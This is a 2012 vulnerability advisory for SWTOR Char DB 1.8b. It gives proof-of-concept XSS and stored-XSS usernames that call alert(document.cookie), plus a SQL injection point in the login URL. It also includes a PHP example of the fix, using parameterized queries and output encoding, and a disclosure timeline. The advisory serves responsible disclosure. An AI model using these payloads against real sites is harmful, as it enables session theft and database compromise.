SSCHADV2012-009 - Star Wars Old Republic - SWTOR Char DB 1.8b Multiple security vulnerabilities
Advisory: Star Wars Old Republic – SWTOR Char DB 1.8b Multiple security vulnerabilities
Advisory ID: SSCHADV2012-009
Author: Stefan Schurtz
Affected Software: Successfully tested on Star Wars Old Republic – SWTOR Char DB 1.8b
Vendor URL:
Vendor Status: fixed
OSVDB ID: 80841, 80842
======================
Vulnerability Description
======================
SWTOR Char DB 1.8b is prone to multiple security vulnerabilities: cross-site scripting (XSS), stored XSS, and SQL injection.
==============
PoC-Exploit
==============
XSS
http://[target]/swtor/user/register.php
Username: <script>alert(document.cookie)</script>
Password: whatever
Stored XSS
http://[target]/swtor/user/register.php
Username: 1-->1<ScRiPt >alert(document.cookie)</ScRiPt><!--
Password: whatever
Visit: http://[target]/swtor/index.php?view=members
SQL-Injection
http://[target]/swtor/user/login_check.php?swtorpw=1&swtorun=[sql injection]
=====
Solution
=====
Update to the latest version
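
The class of fix these findings call for, as an added example that is not part of the advisory and not SWTOR Char DB code: the username is bound as a query parameter at login and HTML-encoded when the member list is rendered. The table layout, function names and in-memory SQLite database are assumptions; only the parameter names swtorun and swtorpw come from the PoC URL.

```php
<?php
// Added illustration, not SWTOR Char DB code. Table layout, function names and
// the in-memory SQLite database are assumptions made for this example.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, pwhash TEXT NOT NULL)');

// Registration: the name is stored exactly as submitted, bound as a parameter.
function register_user(PDO $db, string $user, string $pass): void {
    $stmt = $db->prepare('INSERT INTO users (username, pwhash) VALUES (:u, :p)');
    $stmt->execute([':u' => $user, ':p' => password_hash($pass, PASSWORD_DEFAULT)]);
}

// Login check: swtorun is bound as data, so quotes or SQL keywords inside it
// cannot alter the statement. It is only ever compared against the column.
function login_check(PDO $db, string $swtorun, string $swtorpw): bool {
    $stmt = $db->prepare('SELECT pwhash FROM users WHERE username = :u');
    $stmt->execute([':u' => $swtorun]);
    $hash = $stmt->fetchColumn();            // false when no such user exists
    return is_string($hash) && password_verify($swtorpw, $hash);
}

// Member list: every stored name is encoded at output time, which neutralises
// markup regardless of letter case or surrounding comment delimiters.
function render_members(PDO $db): string {
    $html = "<ul>\n";
    foreach ($db->query('SELECT username FROM users ORDER BY username') as $row) {
        $name = htmlspecialchars($row['username'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        $html .= "  <li>{$name}</li>\n";
    }
    return $html . "</ul>\n";
}

// Constructed sample data modelled on the usernames in the PoC section.
register_user($db, '<script>alert(document.cookie)</script>', 'whatever');
register_user($db, '1-->1<ScRiPt >alert(document.cookie)</ScRiPt><!--', 'whatever');
register_user($db, 'alice', 'correct horse');

// The member list now contains the names as inert text (&lt;script&gt;...).
echo render_members($db);

// A valid login succeeds; a name carrying a stray quote is just a non-match.
var_dump(login_check($db, 'alice', 'correct horse'));
var_dump(login_check($db, "alice'", 'correct horse'));
```
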
================
Disclosure Timeline
================
17-Mar-2012 – vendor informed (contact form)
25-Mar-2012 – fixed in Version 1.8c
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======
http://www.darksecurity.de/advisories/2012/SSCHADV2012-009.txt
Comments
David "PrivateSniper" Craig on :
Version 1.8c just released to fix this issue.